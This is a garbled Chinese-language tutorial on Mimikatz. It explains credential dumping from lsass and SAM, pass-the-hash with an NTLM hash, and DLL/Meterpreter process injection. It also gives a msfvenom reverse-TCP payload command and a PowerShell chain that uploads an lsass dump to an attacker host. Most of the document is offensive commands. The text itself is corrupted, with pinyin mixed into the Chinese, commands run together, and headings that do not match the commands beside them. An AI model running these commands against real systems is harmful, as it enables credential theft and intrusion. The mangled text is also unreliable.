一、啥是Mimikatz？

Mimikatz是一款功Neng有力巨大的密码工具，Neng轻巧松地获取Windows系统中的密码信息。它Neng够提取各种密码哈希、明文密码、Kerberos票据等，对于网络平安人员来说是一个非常有用的工具。

二、 Mimikatz的基本用法

先说说我们需要了解Mimikatz的一些基本命令。

token::elevatetoken::whoami

横向渗透

在打中， mimikatz还Neng用于进行横向渗透，进而获取geng许多机器的权限。通过远程施行mimikatz命令， 我们Neng利用被打机器Yi经得到的权限，尝试获取其他机器的口令和凭证。

lsadump::samlsadump::secretslsadump::cache

用token命令提升权限：

privilege::debugsekurlsa::logonpasswords

用lsadump命令提取SAM数据库中的密码：

Mimikatz的基本操作基本上包括三个命令， 分别是sekurlsa、lsadump和token。其中sekurlsaNeng用于抓取当前系统登录者的各种密码， 如明文密码、NTLM hash、Kerberos TGT等；lsadumpNeng从本地SAM数据库和远程SAM数据库等中提取Windows的密码、凭证等信息；token命令可用于模拟权限，将mimikatz的进程权限提升至系统级别，从而绕过一些管束，比方说VBS脚本等。

privilege::debuginject::process /name:lsass.exe /path:C:\temp\mydll.dll

其中， /name指定进程名，/path指定要注入的DLL文件路径。施行该命令后打者会成功注入mydll.dll文件。

三、 Mimikatz的横向渗透技巧

Mimikatz是一款非常有力巨大的工具，Neng帮我们在渗透测试中获取geng许多的信息。

sekurlsa::minidump /in:"\lsass.dmp"sekurlsa::logonpasswords

该命令会打印出lsass进程中存储的全部凭证和口令。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=. LPORT= -f exe -o meterpreter.exe

mimikatz是款功Neng有力巨大的密码查kan工具，在Windows渗透和后渗透过程中起到了hen优良的作用。在用过程中，需要特别注意平安防范，避免工具沦为犯法工具，造成不少许不了的麻烦。

用sekurlsa命令抓取Windows登录者密码：

privilege::debuglsadump::lsa /inject /name: /password:

其中， /inject参数表示注入，/name是账户名称，/password是密码。施行该命令后打者Neng成功获取geng高大的权限。

在被打机器上施行以下命令：

privilege::debuginject::process /name:explorer.exe /path:D:\meterpreter.exe

其中， /name指定进程名，/path指定要注入的DLL文件路径。施行该命令后打者会成功注入Meterpreter流量，并拦截密码。

四、 Mimikatz在平安防护中的应用

Mimikatz不仅Neng用于打，还Neng用于平安防护。

管道提权。打者Neng通过搞优良自己或其他用户的权限，获取系统级别的权限。施行以下命令：

将Meterpreter payload复制到本地机器上：

在新鲜控制台中，施行以下命令：

用mimikatz琢磨lsass.dmp文件。打者在自己的机器上施行以下命令：

$password = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force$cred = new-object System.Management.Automation.PSCredentialInvoke-Command -ComputerName  -Credential $cred -ScriptBlock { lsass::sekurlsa /full } | .\mimikatz.exe "sekurlsa::minidump lsass.dmp"Invoke-WebRequest -URI 'http:///lsass.dmp' -Method PUT -InFile lsass.dmp

其中， $password表示指定的密码，$cred是有力制指定的凭证对象，-ComputerName是远程机器的IP地址，lsass::sekurlsa /full是施行的命令，Invoke-WebRequest是访问远程地址的命令。施行该命令后会将lsass.dmp文件上传到打机器上。

sekurlsa::pth /user:Administrator /domain:test.com /ntlm:f1cedbd432e8d3ea0c1c64a1ac4a9d1c /run:powershell.exe

其中， /user参数指定管理员账户名称，/domain指定域名，/ntlm是hash值，/run参数指定要运行的程序。施行该命令后会返回一个新鲜的控制台。

Mimikatz是一款非常实用的工具，Neng帮我们在渗透测试中获取geng许多的信息。只是我们也要明白，工具只是辅助我们干活的手段，真实正的平安技Neng提升还需要我们不断学和实践。